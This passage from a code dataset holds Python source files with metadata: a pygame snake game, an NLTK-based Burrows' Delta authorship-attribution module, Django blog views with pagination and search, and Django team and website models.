"call"}, {"api_name": "sys.stdout", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.path.exists", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 186, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 195, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 196, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 197, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 199, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 208, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 211, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 212, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 213, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 216, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.path.abspath", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 
216, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 216, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 217, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 217, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 219, "usage_type": "call"}, {"api_name": "snakemake.snakemake", "line_number": 222, "usage_type": "call"}]} +{"seq_id": "6772342", "text": "# -*- coding: utf-8 -*-\n\nimport pygame\nimport random\nSCALE = 20 #地图中有多少个格子\nSIZE = 20#每一格的大小\nWIDTH = SCALE * SIZE\nHEIGHT = SCALE * SIZE\nDIRECT = [[0,-1],[-1,0],[0,1],[1,0]]\ndirt = 1#蛇前进的方向\nsnake = [[4,3],[5,3],[6,3]]\napple = [3,1]\n\ndef snake_update():\n global dirt\n new_body = [0,0]\n new_body[0] = (snake[0][0] + DIRECT[dirt][0]) % SCALE\n new_body[1] = (snake[0][1] + DIRECT[dirt][1]) % SCALE\n if new_body == apple:\n snake.insert(0, new_body)\n return True\n else:\n snake.insert(0, new_body)\n snake.pop()\n return False\ndef apple_update():\n apple[0] = random.randint(0,19)\n apple[1] = random.randint(0,19)\ndef is_lose(screen):\n if snake.count(snake[0]) >= 2:\n return True\n return False\ndef show_second(screen):\n screen.fill([255,255,255])\n font = pygame.font.Font(None, 100)\n text = font.render(\"LOSE\", True, [255,0,0])\n screen.blit(text, [0,100])\n img = pygame.image.load(\"snake.jpg\")\n screen.blit(img, [0, 0])\n pygame.time.delay(100)\ndef show(screen):\n screen.fill([255,255,255])\n for body in snake:\n pygame.draw.rect(screen,[0,255,0], [body[0]*SIZE,body[1]*SIZE, SIZE - 1, SIZE - 1])\n pygame.draw.circle(screen,[255,0,0], [apple[0]*SIZE + SIZE / 2,apple[1]*SIZE + SIZE / 2], SIZE/2)\n pygame.display.flip()\ndef w_down_cb():\n global dirt\n if dirt % 2 !=0:\n dirt = 0\ndef s_down_cb():\n global dirt\n if dirt % 2 !=0:\n dirt = 2\ndef a_down_cb():\n global dirt\n if dirt % 2 !=1:\n dirt = 1\ndef d_down_cb():\n global dirt\n if dirt % 2 !=1:\n dirt = 3\ndef main():\n pygame.init()\n screen = pygame.display.set_mode([WIDTH,HEIGHT])\n running = True\n while running:\n pygame.time.delay(200)#50毫秒延chi\n if snake_update():\n apple_update()\n\n if is_lose(screen):\n show_second(screen)\n pygame.time.delay(1000)\n\n break\n show(screen)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_w:\n w_down_cb()#call back\n elif event.key == pygame.K_s:\n s_down_cb()\n elif event.key == pygame.K_a:\n a_down_cb()\n elif event.key == pygame.K_d:\n d_down_cb()\n show_second(screen)\n pygame.time.delay(1000)\n pygame.quit()\nif __name__ == '__main__':\n main()\n", "sub_path": "A16042-forgiven-作业/homework2/snake.py", "file_name": "snake.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 44, "usage_type": "call"}, 
{"api_name": "pygame.draw", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "104542507", "text": "import nltk\nimport logging\nimport string\nfrom statistics import mean, stdev, StatisticsError\nfrom nltk import word_tokenize\nfrom collections import Counter\n\nclass Database:\n \"\"\"A database contains authors of texts.\"\"\"\n \n def __init__(self,considered_words=0,real_words=False):\n \"\"\"\n Initialize a database. \n \n Keyword arguments:\n considered_words -- Specifies how many of the most common words\n are used for calculating the delta scores.\n If 0 then all are used.\n (default 0)\n real_words -- Specifies if only real words (i.e. alphabetic words)\n should be used for the algorithm. If False then also\n words like '.', ';' etc. are considered.\n (default False)\n \"\"\"\n \n # The following list contains all authors\n # of the database.\n self.authors = []\n \n # The following counter object contains all\n # words of the database and their respective\n # number of occurrences.\n self.counter = Counter() \n\n # The following two dictionaries contain the \n # mean frequencies and standard deviations of\n # the words in the database respectively.\n # This is with respect to the set of all texts\n # in the database.\n self.mean = {} \n self.stdev = {}\n\n self.txt_number = 0 # the number of texts in the database\n \n # The following variable states the number of\n # words to be considered for the algorithm. \n # For example: a value of 30 indicates that \n # we consider the 30 most common words for \n # our calculations.\n # A value of 0 indicates that we do not limit\n # the words used for the calculations.\n self.considered_words = considered_words\n \n # The following boolean value decides if the\n # algorithm considers only real words (like \n # 'the', 'go', 'dog' etc.) 
or if the algorithm\n # should consider all words (this includes \n # also interpunctuation).\n self.real_words = real_words \n \n def add_author(self,*authors):\n \"\"\"Add an authors to the database.\"\"\"\n for author in authors:\n self.authors.append(author)\n \n def calc_counter(self):\n \"\"\"\n Count the occurrences of every word in the database\n and how many texts there are.\n \"\"\"\n logging.info(\"Database: Counting.\")\n for author in self.authors:\n author.calc_counter()\n self.counter += author.counter\n self.txt_number += author.txt_number\n \n # Restrict the words to those who contain only *real* words\n if self.real_words is True: \n # The key k is a tuple of the form (word, tag).\n # We check if the first argument is a real word in the\n # sense that it contains at least one alphabetic character (a-zA-Z)\n # such that words like \"middle-age\" or \"I'll\" are accepted.\n self.counter = Counter({k: v for k,v in dict(self.counter).items() \\\n if sum(c in string.ascii_letters for c in k[0]) > 0 })\n \n # Restrict the number of words used for the calculations\n if self.considered_words > 0:\n n = self.considered_words\n # The following code takes the n most_common words\n # in the database (this yields a list of tuples) \n # and converts it to a dictionary and then again \n # to a counter.\n self.counter = Counter(dict(self.counter.most_common(n)))\n \n \n def calc_mean_stdev(self):\n \"\"\"\n Calculate the mean frequencies and standard deviation \n of every word in the database. \n calc_counter has to be executed before.\n \"\"\"\n \n logging.info(\"Database: Calculating mean and stdev.\")\n for word in self.counter:\n word_scores = []\n for author in self.authors:\n for text in author.texts:\n if word in text.scores:\n word_scores.append(text.scores[word])\n else: # word is *not* in text.scores, \n # i.e. score (frequency) = 0\n word_scores.append(0)\n \n self.mean[word] = mean(word_scores)\n try:\n self.stdev[word] = stdev(word_scores,self.mean[word])\n except StatisticsError:\n # could happen if a word occurs only in one text\n logging.debug(\n \"Database: Calculating mean and stdev: StatisticsError\")\n self.stdev[word] = 0 \n \n def process(self):\n \"\"\"\n Process the Database, i.e. 
count all words and determine \n their mean frequencies and standard deviation with respect \n to all texts.\n \"\"\"\n self.calc_counter()\n self.calc_mean_stdev()\n \n \n \n \nclass Author:\n \"\"\"Represents an author with a collection of his texts.\"\"\"\n \n def __init__(self,name):\n self.name = name # the author's name\n self.texts = [] # a list of the author's text\n self.counter = Counter() # a counter of all words of the author\n \n # The following two dictionaries contain\n # the mean frequencies and their standard\n # deviation with respect to the set of all\n # texts of this author.\n self.mean = {} \n self.stdev = {}\n \n self.txt_number = 0 # the number of texts of this author\n \n # The following dictionary contains the\n # zscores of this author's words again\n # with respect to the set of all texts of\n # this author\n self.zscores = {}\n \n # Has the counter already been calculated?\n self.__counter_calculated = False\n \n def add_text(self,*texts):\n \"\"\"Add texts to this author.\"\"\"\n for text in texts:\n self.texts.append(text)\n self.txt_number += 1\n \n def calc_counter(self):\n \"\"\"Count the occurrences of every word in texts of this author.\"\"\"\n \n if not self.__counter_calculated:\n logging.info(\"Author '%s': Calculating Counter.\",self.name)\n for text in self.texts:\n self.counter += text.counter\n self.__counter_calculated = True\n else:\n logging.info(\"Author '%s': Counter has already been calculated.\",\n self.name)\n \n \n def calc_mean_stdev(self):\n \"\"\"\n Calculate the mean frequencies and standard deviation of every word.\n calc_counter has to be executed before\n \"\"\" \n logging.info(\"Author '%s': Calculating mean and stdev.\",self.name)\n for word in self.counter:\n word_scores = []\n for text in self.texts:\n if word in text.scores:\n word_scores.append(text.scores[word])\n else:\n # word is *not* in text, i.e. score (frequency) is 0!\n word_scores.append(0)\n \n \n self.mean[word] = mean(word_scores)\n try:\n self.stdev[word] = stdev(word_scores,self.mean[word])\n except StatisticsError:\n # This happens, for example, if the author has only one text\n logging.debug(\"Author '%s': Calculating mean\" + \n \"and stdev: StatisticsError\", self.name)\n self.stdev[word] = 0\n \n def calc_zscores(self, database):\n \"\"\"\n Calculate the zscores of this author's words with respect\n to the specified database. These are standardized variables (i.e.\n they have an expected value of 0 and a variance of 1).\n calc_mean_stdev has to be executed before\n \"\"\"\n for word in self.counter:\n # We have to check if the word is in the database's counter because\n # the database's might be restricted, e.g. most common words or \n # only real words. (see the comments of Database.calc_counter())\n if word in database.counter: \n if database.stdev[word] != 0:\n self.zscores[word] = (self.mean[word] - database.mean[word]) \\\n / database.stdev[word]\n else:\n self.zscores[word] = 0\n \n def calc_cmsz(self, database):\n \"\"\"\n Calculate counter, mean, standard deviation and zscores of\n this author with respect to the specified database\n \"\"\"\n self.calc_counter()\n self.calc_mean_stdev()\n self.calc_zscores(database)\n \n \n \n \nclass Text:\n \"\"\"Represents a single text.\"\"\"\n \n def __init__(self,raw,name,process=True,pos_tag=True):\n \"\"\"\n Initialize a text object with raw text.\n \n Keyword arguments:\n raw -- Raw text as a string.\n name -- Name of the text.\n process -- If true then directly process the text. 
(default: True)\n pos_tag -- Should the raw text be POS tagged? (default: True)\n \"\"\"\n self.name = name\n self.raw = raw\n self.tokens = []\n self.tags = []\n self.counter = Counter()\n self.scores = {}\n self.zscores = {}\n self.sum = 0 #number of words in self.raw\n \n if process:\n self.process(pos_tag=pos_tag)\n \n \n def process(self, pos_tag=True):\n \"\"\"\n Process the text at hand, i.e. it is tokenized, tagged and \n counted. Moreover, we calculate the frequency/score of every word\n (relative frequency).\n \n Keyword arguments:\n pos_tag -- Should the raw text be POS tagged? (default: True) \n \"\"\"\n if pos_tag:\n # A list of all tokens can be seen \n # with nltk.help.upenn_tagset()\n logging.info(\"Tokenizing '%s'\",self.name)\n self.tokens = nltk.word_tokenize(self.raw) \n logging.info(\"Tagging '%s'\",self.name)\n self.tags = nltk.pos_tag(self.tokens)\n else:\n logging.info(\"Preparing '%s'\", self.name)\n # the following takes all alphabetic words normalized to lowercase\n # from the raw data\n self.tags = [x for x in \n [''.join(c for c in word if c.isalpha()).lower() \n for word in self.raw.split()] \n if x != '']\n \n \n logging.info(\"Counting '%s'\", self.name)\n self.counter = Counter(self.tags)\n self.sum = sum(self.counter.values())\n \n logging.info(\"Calculating the scores of '%s'\", self.name)\n for x in self.counter:\n self.scores[x] = self.counter[x]/self.sum\n \n def calc_zscores(self, database):\n \"\"\"\n Calculate the z-scores with respect to the specified database. These are \n standardized variables (i.e. they have an expected value of 0 and \n a variance of 1).\n process has to be executed before.\n \"\"\"\n logging.info(\"Calculating the zscores of '%s'\",self.name)\n \n # Here we have a problem if there's a word in the\n # database whose standard deviation is 0. But this \n # should only happen if there is only one text in \n # the database or the word has the same frequency \n # in every text. For the moment, this shouldn't be \n # a problem.\n \n for word in database.counter:\n if word in self.counter:\n self.zscores[word] = (self.scores[word] \\\n - database.mean[word]) / database.stdev[word]\n \n \n def calc_delta(self, database, author):\n \"\"\"\n Calculate the delta for this text and the given author. 
\n Specify a database and an author from this database.\n calc_zscores has to be executed before\n \"\"\"\n logging.info(\"Text '%s': Calculating delta for author '%s'.\",\n self.name,author.name)\n absolute_differences = {}\n absolute_differences_sum = 0\n for word in database.counter:\n if word in self.counter:\n if word in author.zscores:\n absolute_differences[word] = abs(\n self.zscores[word] - author.zscores[word] )\n else:\n absolute_differences[word] = abs(self.zscores[word])\n absolute_differences_sum += absolute_differences[word]\n return absolute_differences_sum # / sum(self.counter.values())", "sub_path": "delta.py", "file_name": "delta.py", "file_ext": "py", "file_size_in_byte": 13078, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 83, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 84, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 103, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 116, "usage_type": "call"}, {"api_name": "statistics.StatisticsError", "line_number": 117, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 119, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 176, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 185, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 198, "usage_type": "call"}, {"api_name": "statistics.StatisticsError", "line_number": 199, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 201, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 252, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 273, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 274, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 275, "usage_type": "call"}, {"api_name": "nltk.pos_tag", "line_number": 276, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 278, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 287, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 291, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 302, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 323, "usage_type": "call"}]} +{"seq_id": "329128029", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\n# Create your views here.\nfrom .models import Post, Category, Tag, User\nfrom django.db.models import Q\n# from markdown import markdown,Markdown\n# from markdown.extensions.toc import TocExtension\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nimport markdown\nfrom django.views.generic import ListView, DetailView\nfrom comments.forms import 
CommentForm\n\n\n# view function used for the first test\ndef index_back(request):\n    return render(request, 'boardapp/index.html', context={\n        'title': '我的公告板首页',\n        'welcome': '欢迎访问我的公告板首页'\n    })\n    # return HttpResponse(\"欢迎来到我的主页\")\n\n\n# def index(request):\n#     post_list = Post.objects.all().order_by('created_time')\n#     return render(request,'boardapp/index.html',context={'post_list':post_list})\ndef fullwith(request):\n    return render(request, 'fullwidth.html')\n    # return HttpResponse('hello world')\n\n\ndef contact(request):\n    return render(request, 'contact.html')\n\n\ndef regards(request):\n    return render(request, 'regards.html')\n\n\nclass IndexView(ListView):\n    model = Post\n    template_name = 'boardapp/index.html'\n    context_object_name = 'post_list'\n    paginate_by = 2\n\n    def pagination_data(self, paginator, page, is_paginated):\n        if not is_paginated:\n            return {}\n        # set the default values\n        # 1. first: whether to show a link to the first page\n        first = False\n        # 2. whether to show an ellipsis to the left of the current page\n        left_has_more = False\n        # 3. the few page numbers to the left of the current page\n        left = []\n        # 4. the current page number\n        page_number = page.number\n        # 5. the few page numbers to the right of the current page\n        right = []\n        # 6. whether to show an ellipsis to the right of the current page\n        right_has_more = False\n        # 7. last: whether to show a link to the last page\n        last = False\n\n        # total number of pages\n        total_pages = paginator.num_pages\n\n        # the full list of page numbers; e.g. with 10 pages, page_range is [1,2,3,4,5,6,7,8,9,10]\n        page_range = paginator.page_range\n\n        # if the current page is the first page\n        if page_number == 1:\n            right = page_range[page_number:page_number + 1]\n            if right[-1] < total_pages - 1:\n                right_has_more = True\n            if right[-1] < total_pages:\n                last = True\n        elif page_number == total_pages:  # if the current page is the last page\n            left = page_range[(page_number - 2) if (page_number - 2) > 0 else 0:page_number - 1]\n            if left[0] > 2:\n                left_has_more = True\n            if left[0] > 1:\n                first = True\n        else:\n            left = page_range[(page_number - 2) if (page_number - 2) > 0 else 0:page_number - 1]\n            right = page_range[page_number:page_number + 1]\n            if right[-1] < total_pages - 1:\n                right_has_more = True\n            if right[-1] < total_pages:\n                last = True\n            if left[0] > 2:\n                left_has_more = True\n            if left[0] > 1:\n                first = True\n        data = {\n            'left': left,\n            'right': right,\n            'left_has_more': left_has_more,\n            'right_has_more': right_has_more,\n            'first': first,\n            'last': last,\n        }\n\n        return data\n\n    def get_context_data(self, **kwargs):\n        # start from the context returned by the base class's get_context_data()\n        context = super().get_context_data(**kwargs)\n        paginator = context.get('paginator')\n        page = context.get('page_obj')\n        is_paginated = context.get('is_paginated')\n\n        pagination_data = self.pagination_data(paginator, page, is_paginated)\n        context.update(pagination_data)\n        print(context)\n        return context\n\n\ndef detail(request, post_id):\n    post = get_object_or_404(Post, pk=post_id)\n    post.increase_views()\n    # print(request.user.username)\n    # user = get_object_or_404(User,username = request.user.username)\n    # print(user.__dict__)\n    post.body = markdown.markdown(post.body, extensions=[\n        'markdown.extensions.extra',\n        'markdown.extensions.codehilite',\n        'markdown.extensions.toc', ])\n    form = CommentForm()\n    comment_list = post.comment_set.all()\n    context = {'post': post,\n               'form': form,\n               'comment_list': comment_list}\n    return render(request, 'boardapp/detail.html', context=context)\n\n\ndef archives(request, year, month):\n    post_list = Post.objects.filter(created_time__year=year,\n                                    created_time__month=month).order_by('-created_time')\n    return render(request, 'boardapp/index.html', context={\"post_list\": post_list})\n\n\ndef category(request, pk):\n    cate = get_object_or_404(Category, pk=pk)\n    post_list = Post.objects.filter(category=cate).order_by('-created_time')\n    return render(request, 'boardapp/index.html', context={'post_list': post_list})\n\n\ndef tags(request, pk):\n    cate = get_object_or_404(Tag, pk=pk)\n    post_list = Post.objects.filter(tags=cate).order_by('-created_time')\n    print(post_list)\n    return render(request, 'boardapp/index.html', context={'post_list': post_list})\n\n\ndef search(request):\n    q = request.GET.get('q')\n    error_msg = \"\"\n    if not q:\n        error_msg = \"请输入要查找的信息\"\n        return render(request, 'boardapp/index.html', 
{'error_msg': error_msg})\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n return render(request, 'boardapp/index.html', {'error_msg': error_msg, 'post_list': post_list})\n", "sub_path": "board/boardapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5664, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 120, "usage_type": "argument"}, {"api_name": "markdown.markdown", "line_number": 126, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 135, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 145, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 145, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Tag", "line_number": 151, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 152, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 163, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 163, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "233172313", "text": "from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom jsonfield import JSONField\n\nUser = get_user_model()\n\n\nclass Team(models.Model):\n name = models.CharField(max_length=64, unique=True)\n # description = models.TextField(max_length=1024)\n # logo = models.ImageField()\n\n members = models.ManyToManyField(User)\n owner = models.ForeignKey(User, 
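The pagination_data helper in the views.py record above computes a sliding window of page links around the current page. A minimal framework-free sketch of the same windowing idea (page_window and radius are illustrative names, not part of the record):

def page_window(page_number, total_pages, radius=1):
    # Page numbers shown immediately left/right of the current page.
    left = list(range(max(1, page_number - radius), page_number))
    right = list(range(page_number + 1, min(total_pages, page_number + radius) + 1))
    return {
        'left': left,
        'right': right,
        # Show a leading "1 ..." when the left window stops short of page 1.
        'first': bool(left) and left[0] > 1,
        'left_has_more': bool(left) and left[0] > 2,
        # Show a trailing "... N" when the right window stops short of the last page.
        'last': bool(right) and right[-1] < total_pages,
        'right_has_more': bool(right) and right[-1] < total_pages - 1,
    }

print(page_window(5, 10))  # left=[4], right=[6], ellipses and jump links on both sides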
on_delete=models.CASCADE, related_name=\"teamowner\")\n date_added = models.DateTimeField(auto_now_add=True)\n\n\nclass Star(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name=\"team\")\n date_added = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\"user\", \"team\")\n\n\nclass FunctionItem(models.Model):\n team = models.ForeignKey(\n Team,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"functionitems\",\n )\n\n name = models.TextField(max_length=200)\n data = JSONField(max_length=800)\n\n date_added = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n # class Meta:\n # unique_together = (\"name\", \"team\")\n\n def __str__(self):\n return \"%s: %s\" % (self.name, self.data)\n\n\nclass WebSite(models.Model):\n\n url = models.URLField()\n name = models.CharField(max_length=200)\n team = models.ForeignKey(\n Team, blank=True, null=True, on_delete=models.CASCADE, related_name=\"websites\"\n )\n date_added = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s (%s)\" % (self.url, self.name)\n\n", "sub_path": "zhi/zhiteam/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 5, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 28, "usage_type": 
